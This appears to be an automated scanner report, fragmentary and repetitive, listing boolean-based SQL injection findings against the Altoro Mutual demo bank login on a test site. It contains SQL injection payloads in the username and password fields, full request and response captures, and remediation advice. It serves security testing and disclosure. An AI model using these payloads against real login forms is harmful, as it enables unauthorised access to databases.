<td colspan="2"><span id="
_ctl0__ctl0_Content_Main_promo"><table width=590
border=0><tr><td><h2>Congratulations!
</h2></td></tr><tr><td>You have been pre-approved for an Altoro
Gold Visa with a credit limit of $10000!</td></tr><tr><td>Click <a
</div>
</td>
</div>
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
|
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
|
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
|
© 2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right"> <a href="https:
</body>
</html>
<!-- END FOOTER -->
False Request: POST https://demo.testfire.net/doLogin HTTP/1.1
Origin: https://demo.testfire.net
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net/login.jsp
uid=%27+or+8%3D6+--+-&passw=Passwor1&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:31:39 GMT
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
</div>
<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {
function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);
} else if (!(myform.uid.value.length)) {
myform.reset();
myform.uid.focus();
alert ("You must enter a valid username");
return (false);
} else {
myform.passw.focus();
alert ("You must enter a valid password");
return (false);
}
}
window.onload = setfocus;
</script>
</td>
</div>
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
</body>
</html>
<!-- END FOOTER -->
Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
that are not explicitly allowed (i.e. a white-list). This list should be as
restrictive as possible. This is particularly important when the original
source of data is beyond the control of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: https
Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection
Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - https://65.61.137.117:8443/doLogin - uid
False Injection: ' or 8=6 -- -
True Injection: ' or 8=8 -- -
True and false injections produced different responses
True Request: POST https://65.61.137.117:8443/doLogin HTTP/1.1
Origin: https://65.61.137.117:8443
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117:8443/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
<span id="_ctl0__ctl0_Content_Administration">
<br style="line-height: 10px;"/>
<b>ADMINISTRATION</b>
<ul class="sidebar">
<li><a href="/admin/admin.jsp"
>Edit Users</a></li>
</ul>
</span>
</td>
<!-- MEMBER TOC END -->
<td valign="top" colspan="3" class="bb">
<p>
Welcome to Altoro Mutual Online.
</p>
</select>
<input type="submit" id="btnGetAccount"
value=" GO ">
</td>
</tr>
<tr>
<td colspan="2"><span id="
_ctl0__ctl0_Content_Main_promo"><table width=590
border=0><tr><td><h2>Congratulations!
</h2></td></tr><tr><td>You have been pre-approved for an Altoro
Gold Visa with a credit limit of $10000!</td></tr><tr><td>Click <a
</div>
</td>
</div>
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
|
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
|
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
|
© 2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right"> <a href="https:
</body>
</html>
<!-- END FOOTER -->
False Request: POST https://65.61.137.117:8443/doLogin HTTP/1.1
Origin: https://65.61.137.117:8443
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117:8443/login.jsp
uid=%27+or+8%3D6+--+-&passw=Passwor1&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:38:32 GMT
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
</div>
<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {
function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);
} else if (!(myform.uid.value.length)) {
myform.reset();
myform.uid.focus();
alert ("You must enter a valid username");
return (false);
} else {
myform.passw.focus();
alert ("You must enter a valid password");
return (false);
}
}
window.onload = setfocus;
</script>
</td>
</div>
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
</body>
</html>
<!-- END FOOTER -->
Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
that are not explicitly allowed (i.e. a white-list). This list should be as
restrictive as possible. This is particularly important when the original
source of data is beyond the control of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: https
Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection
Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - https://65.61.137.117:8443/doLogin - passw
False Injection: ' or 8=6 -- -
True Injection: ' or 8=8 -- -
True and false injections produced different responses
True Request: POST https://65.61.137.117:8443/doLogin HTTP/1.1
Origin: https://65.61.137.117:8443
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117:8443/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded
uid=CHSuser&passw=%27+or+8%3D6+--+-&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:38:37 GMT
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
</div>
<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {
document.login.passw.focus();
}
}
function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);
} else if (!(myform.uid.value.length)) {
myform.reset();
myform.uid.focus();
alert ("You must enter a valid username");
return (false);
} else {
myform.passw.focus();
alert ("You must enter a valid password");
return (false);
}
}
window.onload = setfocus;
</script>
</td>
</div>
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
<a id="HyperLink6" href="/index.jsp?content=security.htm"
</body>
</html>
<!-- END FOOTER -->
Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
that are not explicitly allowed (i.e. a white-list). This list should be as
restrictive as possible. This is particularly important when the original
source of data is beyond the control of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: https
Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection
Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - https://65.61.137.117/doLogin - uid
False Injection: ' or 8=6 -- -
True Injection: ' or 8=8 -- -
True and false injections produced different responses
True Request: POST https://65.61.137.117/doLogin HTTP/1.1
Origin: https://65.61.137.117
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded
uid=%27+or+8%3D8+--+-&passw=Passwor1&btnSubmit=Login
True Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
<span id="_ctl0__ctl0_Content_Administration">
<br style="line-height: 10px;"/>
<b>ADMINISTRATION</b>
<ul class="sidebar">
<li><a href="/admin/admin.jsp"
>Edit Users</a></li>
</ul>
</span>
</td>
<!-- MEMBER TOC END -->
<td valign="top" colspan="3" class="bb">
<p>
Welcome to Altoro Mutual Online.
</p>
</select>
<input type="submit" id="btnGetAccount"
value=" GO ">
</td>
</tr>
<tr>
<td colspan="2"><span id="
_ctl0__ctl0_Content_Main_promo"><table width=590
border=0><tr><td><h2>Congratulations!
</h2></td></tr><tr><td>You have been pre-approved for an Altoro
Gold Visa with a credit limit of $10000!</td></tr><tr><td>Click <a
href='apply.jsp'>Here</a> to apply.
</td></tr></table></span></td>
</div>
</td>
</div>
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
|
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
|
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
|
© 2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right"> <a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
</body>
</html>
<!-- END FOOTER -->
False Request: POST https://65.61.137.117/doLogin HTTP/1.1
Origin: https://65.61.137.117
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
uid=%27+or+8%3D6+--+-&passw=Passwor1&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:05:35 GMT
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
</div>
<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {
document.login.passw.focus();
}
function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);
} else if (!(myform.uid.value.length)) {
myform.reset();
myform.uid.focus();
alert ("You must enter a valid username");
return (false);
} else {
myform.passw.focus();
alert ("You must enter a valid password");
return (false);
}
}
window.onload = setfocus;
</script>
</td>
</div>
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
</body>
</html>
<!-- END FOOTER -->
Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
that are not explicitly allowed (i.e. a white-list). This list should be as
restrictive as possible. This is particularly important when the original
source of data is beyond the control of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: http
Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection
Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - http://demo.testfire.net:8080/doLogin - passw
False Injection: ' or 8=6 -- -
True Injection: ' or 8=8 -- -
True and false injections produced different responses
True Request: POST http://demo.testfire.net:8080/doLogin HTTP/1.1
Origin: http://demo.testfire.net:8080
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net:8080/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded
uid=CHSuser&passw=%27+or+8%3D8+--+-&btnSubmit=Login
True Response: HTTP/1.1 500 Internal Server Error
uid=CHSuser&passw=%27+or+8%3D6+--+-&btnSubmit=Login
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
</div>
<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {
document.login.passw.focus();
}
}
function confirminput(myform) {
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
|
</body>
</html>
<!-- END FOOTER -->
Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
that are not explicitly allowed (i.e. a white-list). This list should be as
restrictive as possible. This is particularly important when the original
source of data is beyond the control of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: http
Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection
Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - http://65.61.137.117:8080/doLogin - passw
False Injection: ' or 8=6 -- -
True Injection: ' or 8=8 -- -
True and false injections produced different responses
True Request: POST http://65.61.137.117:8080/doLogin HTTP/1.1
Origin: http://65.61.137.117:8080
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117:8080/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded
uid=CHSuser&passw=%27+or+8%3D8+--+-&btnSubmit=Login
True Response: HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Language: en
uid=CHSuser&passw=%27+or+8%3D6+--+-&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
</div>
<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {
document.login.passw.focus();
}
}
function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
|
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
|
</body>
Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
that are not explicitly allowed (i.e. a white-list). This list should be as
restrictive as possible. This is particularly important when the original
source of data is beyond the control of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: http
Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection
Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - http://demo.testfire.net/doLogin - passw
False Injection: ' or 8=6 -- -
True Injection: ' or 8=8 -- -
True and false injections produced different responses
True Request: POST http://demo.testfire.net/doLogin HTTP/1.1
Origin: http://demo.testfire.net
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded
uid=CHSuser&passw=%27+or+8%3D8+--+-&btnSubmit=Login
True Response: HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Language: en
Content-Length: 1004
Date: Tue, 06 Aug 2019 04:34:47 GMT
Connection: close
uid=CHSuser&passw=%27+or+8%3D6+--+-&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:34:47 GMT
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
</div>
<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {
document.login.passw.focus();
}
}
function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);
} else if (!(myform.uid.value.length)) {
myform.reset();
myform.uid.focus();
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
|
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
|
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
|
© 2019 Altoro Mutual, Inc.
</body>
</html>
<!-- END FOOTER -->
Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection
Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - https://demo.testfire.net/doLogin - passw
False Injection: ' or 8=6 -- -
True Injection: ' or 8=8 -- -
True and false injections produced different responses
True Request: POST https://demo.testfire.net/doLogin HTTP/1.1
Origin: https://demo.testfire.net
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded
uid=CHSuser&passw=%27+or+8%3D8+--+-&btnSubmit=Login
True Response: HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Language: en
Content-Length: 1004
Date: Tue, 06 Aug 2019 04:31:43 GMT
Connection: close
uid=CHSuser&passw=%27+or+8%3D6+--+-&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:31:43 GMT
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
</div>
<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {
document.login.passw.focus();
}
}
function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);
} else if (!(myform.uid.value.length)) {
myform.reset();
myform.uid.focus();
alert ("You must enter a valid username");
return (false);
} else {
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
|
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
|
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
|
© 2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right"> <a href="https:
</body>
</html>
<!-- END FOOTER -->
Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: http
Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection
Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - http://65.61.137.117:8080/doLogin - uid
False Injection: ' or 8=6 -- -
True Injection: ' or 8=8 -- -
True and false injections produced different responses
True Request: POST http://65.61.137.117:8080/doLogin HTTP/1.1
Origin: http://65.61.137.117:8080
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117:8080/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded
uid=%27+or+8%3D8+--+-&passw=Passwor1&btnSubmit=Login
True Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 6706
Date: Tue, 06 Aug 2019 04:35:47 GMT
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
<span id="_ctl0__ctl0_Content_Administration">
<br style="line-height: 10px;"/>
<b>ADMINISTRATION</b>
<ul class="sidebar">
<li><a href="/admin/admin.jsp"
>Edit Users</a></li>
</ul>
</span>
</td>
<!-- MEMBER TOC END -->
<td valign="top" colspan="3" class="bb">
<p>
Welcome to Altoro Mutual Online.
</p>
</select>
<input type="submit" id="btnGetAccount"
value=" GO ">
</td>
</tr>
<tr>
<td colspan="2"><span id="
_ctl0__ctl0_Content_Main_promo"><table width=590
border=0><tr><td><h2>Congratulations!
</h2></td></tr><tr><td>You have been pre-approved for an Altoro
Gold Visa with a credit limit of $10000!</td></tr><tr><td>Click <a
href='apply.jsp'>Here</a> to apply.
</td></tr></table></span></td>
</tr>
</table>
</form>
</div>
</td>
</div>
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
|
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
|
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
|
© 2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right"> <a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
<br><br><br>
<div class="disclaimer">
The AltoroJ website is published by IBM Corporation for the sole
purpose of
demonstrating the effectiveness of IBM products in detecting web
application
vulnerabilities and website defects. This site is not a real banking
site. Similarities,
if any, to third party products and/or websites are purely
coincidental. This site is
provided "as is" without warranty of any kind, either express or
implied. IBM does
</body>
</html>
<!-- END FOOTER -->
False Request: POST http://65.61.137.117:8080/doLogin HTTP/1.1
Origin: http://65.61.137.117:8080
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117:8080/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded
uid=%27+or+8%3D6+--+-&passw=Passwor1&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:35:47 GMT
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
</div>
<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {
document.login.passw.focus();
}
}
function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);
} else if (!(myform.uid.value.length)) {
myform.reset();
myform.uid.focus();
alert ("You must enter a valid username");
return (false);
} else {
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
|
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
|
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
|
© 2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right"> <a href="https:
</body>
</html>
<!-- END FOOTER -->
Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: https
Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection
Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - https://65.61.137.117/doLogin - passw
False Injection: ' or 8=6 -- -
True Injection: ' or 8=8 -- -
True and false injections produced different responses
True Request: POST https://65.61.137.117/doLogin HTTP/1.1
Origin: https://65.61.137.117
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded
uid=CHSuser&passw=%27+or+8%3D8+--+-&btnSubmit=Login
True Response: HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Language: en
Content-Length: 1004
Date: Tue, 06 Aug 2019 04:05:38 GMT
Connection: close
uid=CHSuser&passw=%27+or+8%3D6+--+-&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:05:38 GMT
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
</div>
<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {
document.login.passw.focus();
}
}
function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);
} else if (!(myform.uid.value.length)) {
myform.reset();
myform.uid.focus();
alert ("You must enter a valid username");
return (false);
} else {
myform.passw.focus();
alert ("You must enter a valid password");
return (false);
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
|
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
|
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
|
© 2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right"> <a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
<br><br><br>
</body>
</html>
<!-- END FOOTER -->
Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: http
Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - http://65.61.137.117/doLogin - passw
False Injection: ' or 8=6 -- -
True Injection: ' or 8=8 -- -
True and false injections produced different responses
True Request: POST http://65.61.137.117/doLogin HTTP/1.1
Origin: http://65.61.137.117
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
